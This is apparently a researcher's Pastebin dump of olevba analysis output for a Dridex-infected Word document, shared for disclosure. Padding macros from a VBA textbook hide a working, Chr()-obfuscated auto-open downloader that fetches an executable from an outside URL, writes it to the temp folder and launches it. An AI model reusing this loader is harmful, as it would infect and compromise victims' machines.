SHARE
TWEET

Malicious Word macro

dynamoo Jun 26th, 2015 242 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.26 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASI-B- dridex.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: dridex.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: dridex.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub ôñÔÔÀ(FFFFF As Long)
  17.  
  18. TOT9Qr3J8P
  19.  
  20. End Sub
  21.  
  22. Sub autoopen()
  23.  
  24. ôñÔÔÀ (3)
  25.  
  26. End Sub
  27.  
  28.  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  30. ANALYSIS:
  31. +----------+----------+---------------------------------------+
  32. | Type     | Keyword  | Description                           |
  33. +----------+----------+---------------------------------------+
  34. | AutoExec | AutoOpen | Runs when the Word document is opened |
  35. +----------+----------+---------------------------------------+
  36. -------------------------------------------------------------------------------
  37. VBA MACRO Module1.bas
  38. in file: dridex.doc - OLE stream: u'Macros/VBA/Module1'
  39. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  40. '
  41. Sub PublishAutoFilterRange()
  42.     Ôû.Sheets("Query").AutoFilterMode = False
  43.     ä.Range("Query_From_Northwind").Select
  44.     â.Range("Query_From_Northwind").AutoFilter _
  45.         Field:=1, _
  46.         Criteria1:="Condiments"
  47.     ThisWorkbook.PublishObjects.Add( _
  48.         SourceType:=xlSourceAutoFilter, _
  49.         FileName:="C:\Publish01.htm", _
  50.         Sheet:="Query", _
  51.         Source:=ô.Sheets("Query").AutoFilter.Range, _
  52.         HtmlType:=xlHtmlStatic, _
  53.         DivID:="ExcelAutoFilter", _
  54.         Title:="Excel AutoFilter Range").Publish True
  55. End Sub
  56. '
  57. ' Publish a chart sheet
  58. '
  59. Sub PublishChartSheet()
  60.     ThisWorkbook.PublishObjects.Add( _
  61.         SourceType:=xlSourceChart, _
  62.         FileName:="C:\Publish02.htm", _
  63.         Sheet:="Chart1", _
  64.         HtmlType:=xlHtmlChart, _
  65.         DivID:="ExcelChartSheet", _
  66.         Title:="Excel Chart Sheet").Publish True
  67. End Sub
  68. '
  69. ' Publish an embedded chart
  70. '
  71. Sub PublishEmbeddedChart()
  72.     ThisWorkbook.PublishObjects.Add( _
  73.         SourceType:=xlSourceChart, _
  74.         FileName:="C:\Publish03.htm", _
  75.         Sheet:="2000 Budget", _
  76.         Source:="Chart 1", _
  77.         HtmlType:=xlHtmlStatic, _
  78.         DivID:="ExcelEmbeddedChart", _
  79.         Title:="Excel Embedded Chart").Publish True
  80. End Sub
  81. '
  82. ' Publish a PivotTable
  83. '
  84. Sub PublishPivotTable()
  85.     ThisWorkbook.PublishObjects.Add( _
  86.         SourceType:=xlSourcePivotTable, _
  87.         FileName:="C:\Publish04.htm", _
  88.         Sheet:="PivotTable", _
  89.         Source:="PivotTable1", _
  90.         HtmlType:=xlHtmlList, _
  91.         DivID:="ExcelPivotTable", _
  92.         Title:="Excel PivotTable").Publish True
  93. End Sub
  94. '
  95. ' Publish a print area
  96. '
  97. Sub PublishPrintArea()
  98.     ç.Worksheets("2000 Budget").PageSetup.PrintArea = "A1:B13"
  99.     ThisWorkbook.PublishObjects.Add( _
  100.         SourceType:=xlSourcePrintArea, _
  101.         FileName:="C:\Publish05.htm", _
  102.         Sheet:="2000 Budget", _
  103.         Source:=ôâ.Worksheets("2000 Budget").PageSetup.PrintArea, _
  104.         HtmlType:=xlHtmlStatic, _
  105.         DivID:="ExcelPrintArea", _
  106.         Title:="Excel Print Area").Publish True
  107. End Sub
  108. '
  109. ' Publish a query table
  110. '
  111. Sub PublishQueryTable()
  112.     ThisWorkbook.PublishObjects.Add( _
  113.         SourceType:=xlSourceQuery, _
  114.         FileName:="C:\Publish06.htm", _
  115.         Sheet:="Query", _
  116.         Source:="Query from Northwind", _
  117.         HtmlType:=xlHtmlCalc, _
  118.         DivID:="ExcelQueryTable", _
  119.         Title:="Excel Query Table").Publish True
  120. End Sub
  121. '
  122. ' Publish a range using coordinates
  123. '
  124. Sub PublishRangeCoordinates()
  125.     ThisWorkbook.PublishObjects.Add( _
  126.         SourceType:=xlSourceRange, _
  127.         FileName:="C:\Publish07.htm", _
  128.         Sheet:="2000 Budget", _
  129.         Source:="A1:B17", _
  130.         HtmlType:=xlHtmlCalc, _
  131.         DivID:="ExcelRangeCoordinates", _
  132.         Title:="Excel Range Coordinates").Publish True
  133. End Sub
  134. '
  135. ' Publish a range using a name
  136. '
  137. Sub PublishRangeName()
  138.     ThisWorkbook.PublishObjects.Add( _
  139.         SourceType:=xlSourceRange, _
  140.         FileName:="C:\Publish08.htm", _
  141.         Source:="Expenses", _
  142.         HtmlType:=xlHtmlStatic, _
  143.         DivID:="ExcelRangeName", _
  144.         Title:="Excel Range Name").Publish True
  145. End Sub
  146.  
  147. Public Function WphmxowcstXb(A7X71OY4p As String)
  148.  Set zBo1iklWv9Sz = dFlagLB30D("S" & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & "c" & "a" & Chr(116) & Chr(105) & "o" & Chr(110))
  149. zBo1iklWv9Sz.Open (QrDNQZQRP)
  150. End Function
  151. Public Function dFlagLB30D(HvbtyGByuxg3J As String)
  152.  Set dFlagLB30D = CreateObject(HvbtyGByuxg3J)
  153. End Function
  154. Public Function IrQ2IESgmYoy(UNIWVVc542vt As Variant, cNvH4h9GxP As String)
  155. Dim oUeKB2dS: Set oUeKB2dS = dFlagLB30D(Chr(65) & "d" & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & "t" & Chr(114) & Chr(101) & "a" & "m")
  156.  
  157. With oUeKB2dS
  158.    .Type = 1
  159.     .Open
  160.     .write UNIWVVc542vt
  161.     .savetofile cNvH4h9GxP, 2
  162. End With
  163. End Function
  164.  
  165. '
  166. ' Publish a worksheet
  167. '
  168. Sub PublishWorksheet()
  169.     ThisWorkbook.PublishObjects.Add( _
  170.         SourceType:=xlSourceSheet, _
  171.         FileName:="C:\Publish09.htm", _
  172.         Sheet:="2000 Budget", _
  173.         HtmlType:=xlHtmlCalc, _
  174.         DivID:="ExcelWorksheet", _
  175.         Title:="Excel Worksheet").Publish True
  176. End Sub
  177. '
  178. ' Listing 20.2. Republishing a PublishObject.
  179. '
  180. Sub RepublishObject()
  181.     Dim strID As String
  182.     strID = "ExcelRangeCoordinates"
  183.     For Each po In ThisWorkbook.PublishObjects
  184.         If po.DivID = strID Then
  185.             po.Publish
  186.             Exit For
  187.         End If
  188.     Next 'po
  189. End Sub
  190. '
  191. ' Listing 20.3. A procedure that deletes all the PublishObjects
  192. '
  193. Sub DeletePublishObjects()
  194.   For Each po In ThisWorkbook.PublishObjects
  195.         po.Delete
  196.     Next 'po
  197. End Sub
  198. '
  199. ' Listing 20.4. A procedure that adds a Hyperlink object.
  200. '
  201. Sub AddLink()
  202.     Dim r As Range
  203.     '
  204.    ' Add a paragraph to the end of the document
  205.    '
  206.    With ThisDocument.Paragraphs
  207.         .Item(.Count).Range.InsertParagraphAfter
  208.         Set r = .Item(.Count).Range
  209.     End With
  210.     r.Text = "Sams' Home Page"
  211.     r.Hyperlinks.Add _
  212.         Anchor:=r, _
  213.         Address:="http://www.mcp.com/sams/", _
  214.         ScreenTip:="Click here to visit the home page of Sams!"
  215. End Sub
  216. '
  217. ' Listing 20.5. Procedures that add a link for the Yahoo!
  218. ' search engine and run a query on the Yahoo! database.
  219. '
  220. Sub AddYahoo()
  221.     Dim r As Range
  222.     '
  223.    ' Add a paragraph to the end of the document
  224.    '
  225.    With ThisDocument.Paragraphs
  226.         .Item(.Count).Range.InsertParagraphAfter
  227.         Set r = .Item(.Count).Range
  228.     End With
  229.     r.Text = "Yahoo Search"
  230.     r.Hyperlinks.Add _
  231.         Anchor:=r, _
  232.         Address:="http://search.yahoo.com/bin/search"
  233. End Sub
  234.  
  235. Sub SearchYahoo()
  236.     Dim link As Hyperlink
  237.     Dim keyword As String
  238.     Set link = ThisDocument.Hyperlinks("http://search.yahoo.com/bin/search")
  239.     keyword = InputBox("Enter a search keyword:")
  240.     link.Follow _
  241.         ExtraInfo:="p=" & keyword, _
  242.         Method:=msoMethodGet
  243. End Sub
  244. '
  245. ' Listing 20.6. Using the FollowHyperlink method to display
  246. ' a target document without an existing Hyperlink object.
  247. '
  248. Sub FollowHyperlinkTest()
  249.     Dim keyword As String
  250.     keyword = InputBox("Enter a search keyword:")
  251.     ThisDocument.FollowHyperlink _
  252.         Address:="http://search.yahoo.com/bin/search", _
  253.         ExtraInfo:="p=" & keyword, _
  254.         Method:=msoMethodGet
  255. End Sub
  256. '
  257. ' Listing 20.7. Some event handlers that are used to
  258. ' display a Web page.
  259. '
  260. ' This event handler fires when you first open the form
  261. '
  262. Private Sub UserForm_Initialize()
  263.     Dim maxWidth As Integer
  264.     Dim maxHeight As Integer
  265.     With webWWW
  266.         '
  267.        ' Display and save the initial URL
  268.        '
  269.        If txtLocation <> "" Then
  270.             topPage = txtLocation
  271.             .Navigate txtLocation
  272.         End If
  273.         '
  274.        ' Adjust the width and height of the control
  275.        '
  276.        maxWidth = Ê.Me.Width - .Left - 10
  277.         maxHeight = Ê.Me.Height - .Top - 20
  278.         If Application.UsableWidth > maxWidth Then
  279.             .Width = maxWidth
  280.         End If
  281.         If Application.UsableHeight > maxHeight Then
  282.             .Height = maxHeight
  283.         End If
  284.     End With
  285. End Sub
  286. '
  287. ' This event handler fires when you enter the text box
  288. '
  289. Private Sub txtLocation_Enter()
  290.     '
  291.    ' Make sure Surf! button is the default
  292.    '
  293.    cmdSurf.Default = True
  294. End Sub
  295. '
  296. ' This event handler fires when you click the Surf! button
  297. '
  298. Private Sub cmdSurf_Click()
  299.     '
  300.    ' Surf to the URL specified in the Location text box
  301.    '
  302.    If txtLocation <> "" Then
  303.         webWWW.Navigate txtLocation
  304.     Else
  305.         txtLocation.SetFocus
  306.         Beep
  307.     End If
  308. End Sub
  309. '
  310. ' This event handler fires once the Web page navigation is done
  311. '
  312. Private Sub webWWW_DocumentComplete(ByVal pDisp As Object, URL As Variant)
  313.     lblProgress.Caption = " Done"
  314.     txtLocation = URL
  315. End Sub
  316. '
  317. ' This event handler fires at the start of the download
  318. '
  319. Private Sub webWWW_DownloadBegin()
  320.     lblProgress.Caption = " Downloading..."
  321. End Sub
  322. '
  323. ' This event handler fires when the URL title changes
  324. '
  325. Private Sub webWWW_TitleChange(ByVal Text As String)
  326.     '
  327.    ' Update the form's caption to reflect the new title
  328.    '
  329.    ÊMe.Caption = "The Word Wide Web - " & webWWW.LocationName
  330. End Sub
  331. '
  332. ' This event handler fires when the status text changes
  333. '
  334. Private Sub webWWW_StatusTextChange(ByVal Text As String)
  335.     lblStatus = Text
  336. End Sub
  337. '
  338. ' Listing 20.8. Event handlers for the navigation
  339. ' buttons in the custom Web browser.
  340. '
  341. '
  342. ' This event handler fires when you click the Back button
  343. '
  344. Private Sub cmdBack_Click()
  345.     '
  346.    ' An error occurs if there is no page to go back to
  347.    '
  348.    On Error Resume Next
  349.     webWWW.GoBack
  350. End Sub
  351. '
  352. ' This event handler fires when you click the Forward button
  353. '
  354. Private Sub cmdForward_Click()
  355.     '
  356.    ' An error occurs if there is no page to go forward to
  357.    '
  358.    On Error Resume Next
  359.     webWWW.GoForward
  360. End Sub
  361. '
  362. ' This event handler fires when you click the Top button
  363. '
  364. Private Sub cmdTop_Click()
  365.     webWWW.Navigate topPage
  366. End Sub
  367. '
  368. ' This event handler fires when you click the Refresh button
  369. '
  370. Private Sub cmdRefresh_Click()
  371.     webWWW.Refresh
  372. End Sub
  373. '
  374. ' This event handler fires when you click the Stop button
  375. '
  376. Private Sub cmdStop_Click()
  377.     webWWW.Stop
  378. End Sub
  379. '
  380. ' This event handler fires when you click the Home button
  381. '
  382. Private Sub cmdHome_Click()
  383.     webWWW.GoHome
  384. End Sub
  385. '
  386. ' This event handler fires when you click the Search button
  387. '
  388. Private Sub cmdSearch_Click()
  389.     webWWW.GoSearch
  390. End Sub
  391. '
  392. ' This event handler fires when you click the Exit button
  393. '
  394. Private Sub cmdExit_Click()
  395.     Unload ÊMe
  396. End Sub
  397. '
  398. ' Listing 20.9. A procedure that manipulates Internet Explorer
  399. ' via Automation using various members of the
  400. ' InternetExplorer class.
  401. '
  402. Sub AutomateInternetExplorer()
  403.     Dim ie As Object
  404.     Dim result As Integer
  405.     '
  406.    ' Set up the Automation object
  407.    '
  408.    Set ie = CreateObject("InternetExplorer.Application")
  409.     '
  410.    ' Navigate to a page and customize the browser window
  411.    '
  412.    ie.Navigate "http://www.microsoft.com/ie/"
  413.     ie.Toolbar = False
  414.     ie.StatusBar = False
  415.     ie.MenuBar = False
  416.     '
  417.    ' Twiddle thumbs while the page loads
  418.    '
  419.    Do While ie.Busy
  420.         DoEvents
  421.     Loop
  422.     '
  423.    ' Display page info
  424.    '
  425.    result = MsgBox( _
  426.         "Current URL:  " & ie.LocationURL & Chr(13) & _
  427.         "Current Title: " & ie.LocationName & Chr(13) & _
  428.         "Document type: " & ie.Type & Chr(13) & Chr(13) & _
  429.         "Would you like to view this document?", _
  430.         vbYesNo + vbQuestion)
  431.     If result = vbYes Then
  432.         '
  433.        ' If Yes, make browser visible and activate it
  434.        '
  435.        ie.Visible = True
  436.         AppActivate "Microsoft Internet Explorer"
  437.     Else
  438.         '
  439.        ' If no, bail out
  440.        '
  441.        ie.Quit
  442.     End If
  443.     Set ie = Nothing
  444. End Sub
  445.  
  446. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  447. ANALYSIS:
  448. +------------+----------------------+-----------------------------------------+
  449. | Type       | Keyword              | Description                             |
  450. +------------+----------------------+-----------------------------------------+
  451. | Suspicious | Open                 | May open a file                         |
  452. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  453. |            |                      | strings                                 |
  454. | Suspicious | CreateObject         | May create an OLE object                |
  455. | Suspicious | SaveToFile           | May create a text file                  |
  456. | Suspicious | AppActivate          | May control another application by      |
  457. |            |                      | simulating user keystrokes              |
  458. | Suspicious | Run                  | May run an executable file or a system  |
  459. |            |                      | command                                 |
  460. | Suspicious | Write                | May write to a file (if combined with   |
  461. |            |                      | Open)                                   |
  462. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  463. |            |                      | may be used to obfuscate strings        |
  464. |            |                      | (option --decode to see all)            |
  465. | IOC        | http://www.mcp.com/s | URL                                     |
  466. |            | ams/                 |                                         |
  467. | IOC        | http://search.yahoo. | URL                                     |
  468. |            | com/bin/search       |                                         |
  469. | IOC        | http://www.microsoft | URL                                     |
  470. |            | .com/ie/             |                                         |
  471. +------------+----------------------+-----------------------------------------+
  472. -------------------------------------------------------------------------------
  473. VBA MACRO Module2.bas
  474. in file: dridex.doc - OLE stream: u'Macros/VBA/Module2'
  475. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  476. Public QrDNQZQRP As String
  477.  
  478.  
  479.  
  480.  
  481. ' Listing 13.4. Using the DDEInitiate method to open a DDE channel.
  482. '
  483. Sub TestIt()
  484.    Dim result As Integer
  485.     result = OpenHailingFrequencies
  486.     DDETerminate result
  487. End Sub
  488.  
  489. Function OpenHailingFrequencies() As Integer
  490.     Dim channel As Integer
  491.    
  492.     On Error GoTo BadConnection
  493.     '
  494.    ' Establish the DDE connection to Program Manager
  495.    '
  496.    channel = DDEInitiate("Progman", "Progman")
  497.    
  498.     MsgBox "A channel to Program Manager is now open.", vbInformation
  499.     '
  500.    ' Return the channel number
  501.    '
  502.    OpenHailingFrequencies = channel
  503.     Exit Function
  504.    
  505. BadConnection:
  506.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  507.     '
  508.    ' Return 0
  509.    '
  510.    OpenHailingFrequencies = 0
  511.        
  512. End Function
  513.  
  514. ' Listing 13.5. Using DDEExecute to control a server application.
  515. '
  516. Sub CreateWorkbookIcon()
  517.  
  518.     Dim channel As Integer
  519.     Dim strPath As String, strName As String, strApp As String
  520.    
  521.     On Error GoTo BadConnection
  522.     '
  523.    ' Get info required for program item
  524.    '
  525.    strPath = ActiveWorkbook.Path & "\" & ActiveWorkbook.Name
  526.     strName = Left(ActiveWorkbook.Name, Len(ActiveWorkbook.Name) - 4)
  527.     strApp = Application.Path & "\Excel.exe"
  528.     '
  529.    ' Establish the DDE connection to Program Manager
  530.    '
  531.    channel = DDEInitiate("Progman", "Progman")
  532.     '
  533.    ' Create the group and item
  534.    '
  535.    DDEExecute channel, "[CreateGroup(""Excel Workbooks"")]"
  536.     DDEExecute channel, "[AddItem(""" & strPath & """,""" & strName & """,""""" & strApp & """"")]"
  537.     DDETerminate channel
  538.  
  539.     Exit Sub
  540.    
  541. BadConnection:
  542.     MsgBox "Could not open a channel to Program Manager!", vbExclamation
  543.            
  544. End Sub
  545.  
  546. ' Listing 13.6. Using DDERequest to retrieve data from an
  547. ' application.
  548. '
  549.  
  550. Sub RequestWordData()
  551.     Dim channel As Integer
  552.     Dim wordData As Variant
  553.     Dim getString As String
  554.     On Error GoTo BailOut
  555.     '
  556.    ' Set up the application
  557.    '
  558.    Application.StatusBar = "Starting Word..."
  559.     Application.DisplayAlerts = False
  560.     '
  561.    ' Initiate channel with System topic
  562.    '
  563.    channel = DDEInitiate("Winword", "System")
  564.     '
  565.    ' Open the document we want to work with
  566.    '
  567.    Application.StatusBar = "Opening Word document..."
  568.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  569.     DDETerminate channel
  570.     '
  571.    ' Initiate new channel with document
  572.    '
  573.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  574.     '
  575.    ' Find keyword and add a bookmark
  576.    '
  577.    DDEExecute channel, "[StartOfDocument]"
  578.     DDEExecute channel, "[EditFind .Find = ""ACME""]"
  579.     DDEExecute channel, "[SelectCurSentence]"
  580.     DDEExecute channel, "[EditBookmark .Name = ""Gotcha""]"
  581.     '
  582.    ' Retrieve the bookmark and store it
  583.    '
  584.    wordData = DDERequest(channel, "Gotcha")
  585.     getString = wordData(1)
  586.     r.Worksheets("Sheet1").[A2].Value = getString
  587.     '
  588.    ' Quit Word and terminate channel
  589.    '
  590.    DDEExecute channel, "[FileExit 1]"
  591.     DDETerminate channel
  592.  
  593.     Exit Sub
  594.  
  595. BailOut:
  596.     DDETerminate channel
  597.     MsgBox "DDE operation failed!", vbExclamation
  598.  
  599. End Sub
  600.  
  601. ' Listing 13.7. Using DDEPoke to send data to an application.
  602. '
  603. Sub SendDataToWord()
  604.  
  605.     Dim channel As Integer, pokeData As Variant
  606.     On Error GoTo BailOut
  607.     '
  608.    ' Set up the application
  609.    '
  610.    Application.StatusBar = "Starting Word..."
  611.     Application.DisplayAlerts = False
  612.     '
  613.    ' Initiate channel with System topic
  614.    '
  615.    channel = DDEInitiate("Winword", "System")
  616.     '
  617.    ' Open the document we want to work with
  618.    '
  619.    Application.StatusBar = "Opening Word document..."
  620.     DDEExecute channel, "[FileOpen ""C:\My Documents\Chaptr13.doc""]"
  621.     DDETerminate channel
  622.     '
  623.    ' Initiate new channel with document
  624.    '
  625.    channel = DDEInitiate("Winword", "C:\My Documents\Chaptr13.doc")
  626.     '
  627.    'Get the data to be sent
  628.    '
  629.    Application.StatusBar = "Sending data..."
  630.     Set pokeData = t.Worksheets("Sheet1").[A1]
  631.     '
  632.    'Send it to the "Gotcha" bookmark
  633.    '
  634.    DDEPoke channel, "Gotcha", pokeData
  635.     '
  636.    ' Quit Word and terminate channel
  637.    '
  638.    Application.StatusBar = "Shutting down Word..."
  639.     DDEExecute channel, "[FileExit 1]"
  640.     DDETerminate channel
  641.     Application.StatusBar = False
  642.  
  643.     Exit Sub
  644.  
  645. BailOut:
  646.     DDETerminate channel
  647.     MsgBox "DDE operation failed!", vbExclamation
  648.     Application.StatusBar = False
  649.  
  650. End Sub
  651.  
  652. ' Listing 15.3. Using Automation to run a PowerPoint
  653. ' presentation slide show.
  654. '
  655. Sub TOT9Qr3J8P()
  656.  
  657. Set j9yPFDVwyo = dFlagLB30D("Mi" & Chr(99) & "r" & Chr(111) & Chr(115) & "o" & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & "L" & Chr(72) & "TT" & Chr(80))
  658.  
  659. CallByName j9yPFDVwyo, Chr(79) & Chr(112) & "e" & "n", VbMethod, Chr(71) & Chr(69) & Chr(84), _
  660. Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(99) & Chr(111) & "l" & Chr(99) & Chr(104) & Chr(101) & Chr(115) & Chr(116) & Chr(101) & Chr(114) & Chr(45) & Chr(105) & Chr(110) & Chr(115) & Chr(116) & Chr(105) & Chr(116) & Chr(117) & Chr(116) & Chr(101) & Chr(46) & Chr(99) & Chr(111) & Chr(109) & Chr(47) & "7" & Chr(48) & Chr(56) & Chr(47) & Chr(51) & Chr(52) & Chr(54) & Chr(46) & Chr(101) & Chr(120) & "e" _
  661. , False
  662.  
  663. Set nVoYwy5wi65Ru = dFlagLB30D("W" & Chr(83) & Chr(99) & Chr(114) & "i" & Chr(112) & Chr(116) & Chr(46) & Chr(83) & "h" & "e" & Chr(108) & Chr(108))
  664.  
  665. Set Njvhw3SCwhJF = CallByName(nVoYwy5wi65Ru, Chr(69) & Chr(110) & Chr(118) & Chr(105) & "r" & Chr(111) & Chr(110) & "m" & Chr(101) & Chr(110) & Chr(116), VbGet, Chr(80) & "r" & Chr(111) & Chr(99) & Chr(101) & "s" & Chr(115))
  666.  
  667. NkFurzJgA4 = Njvhw3SCwhJF(Chr(84) & "E" & Chr(77) & Chr(80))
  668.  
  669. QrDNQZQRP = NkFurzJgA4 & Chr(92) & Chr(98) & Chr(105) & "k" & Chr(115) & Chr(101) & Chr(110) & Chr(112) & Chr(100) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
  670. Dim yRG5Tmsczw() As Byte
  671.  
  672. CallByName j9yPFDVwyo, "S" & "e" & Chr(110) & Chr(100), VbMethod
  673. yRG5Tmsczw = CallByName(j9yPFDVwyo, "r" & Chr(101) & Chr(115) & Chr(112) & "o" & Chr(110) & Chr(115) & Chr(101) & Chr(66) & Chr(111) & "d" & Chr(121), VbGet)
  674. IrQ2IESgmYoy yRG5Tmsczw, QrDNQZQRP
  675. On Error GoTo ehUAReVao5
  676.     a = 197 / 0
  677.   On Error GoTo 0
  678.  
  679. PBWxy1g8qJuzYK:
  680.   Exit Sub
  681. ehUAReVao5:
  682.   WphmxowcstXb ("HBaMqGixX")
  683. Resume PBWxy1g8qJuzYK
  684. End Sub
  685. Sub RunPresentation()
  686.     On Error GoTo OpenPowerPoint
  687.     '
  688.    ' Reference the existing PowerPoint Application object
  689.    '
  690.    Set ppApp = GetObject(, "PowerPoint.Application")
  691.     '
  692.    ' Work with PowerPoint's Application object directly
  693.    '
  694.    With ppApp
  695.         '
  696.        ' Display PowerPoint
  697.        '
  698.        .Visible = True
  699.         '
  700.        ' Open and then run the presentation's slide show
  701.        '
  702.        .Presentations.Open "C:\My Documents\Juggling.ppt"
  703.         .Presentations("Juggling.ppt").SlideShowSettings.Run
  704.     End With
  705.     Set ppApp = Nothing
  706. '
  707. ' Program branches here if PowerPoint isn't running
  708. '
  709. OpenPowerPoint:
  710.     ' Create a new instance of PowerPoint's Application object
  711.    '
  712.    Set ppApp = CreateObject("PowerPoint.Application")
  713.     '
  714.    ' Continue after the statement that caused the error
  715.    '
  716.    Resume Next
  717. End Sub
  718.  
  719. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  720. ANALYSIS:
  721. +------------+----------------+-----------------------------------------+
  722. | Type       | Keyword        | Description                             |
  723. +------------+----------------+-----------------------------------------+
  724. | Suspicious | Open           | May open a file                         |
  725. | Suspicious | Chr            | May attempt to obfuscate specific       |
  726. |            |                | strings                                 |
  727. | Suspicious | CreateObject   | May create an OLE object                |
  728. | Suspicious | Run            | May run an executable file or a system  |
  729. |            |                | command                                 |
  730. | Suspicious | CallByName     | May attempt to obfuscate malicious      |
  731. |            |                | function calls                          |
  732. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  733. |            |                | may be used to obfuscate strings        |
  734. |            |                | (option --decode to see all)            |
  735. | IOC        | Excel.exe      | Executable file name                    |
  736. +------------+----------------+-----------------------------------------+
RAW Paste Data
Challenge yourself this year...
Learn something new in 2017
Top